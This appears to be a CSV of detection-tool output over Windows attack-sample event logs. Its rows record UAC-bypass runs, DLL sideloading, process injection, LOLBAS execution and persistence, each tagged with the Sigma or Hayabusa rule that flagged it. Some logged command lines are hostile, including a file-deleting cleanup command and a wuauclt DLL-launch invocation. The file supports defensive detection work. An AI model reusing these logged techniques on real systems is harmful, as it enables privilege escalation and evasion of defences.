00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 
00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 
00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 
00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: 
""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 07:11:17.572 
+09:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:18.930 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 
(02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 00247C92-09FE-5F86-0000-0010AC861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? 
| LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.738 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.764 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: 
C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.765 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious 
Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.449 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL 
File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable 
Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.312 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,Evas | Exec,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.130 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 747F3D96-D8F5-5F8A-0000-00106B6F7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete 
File,,rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: 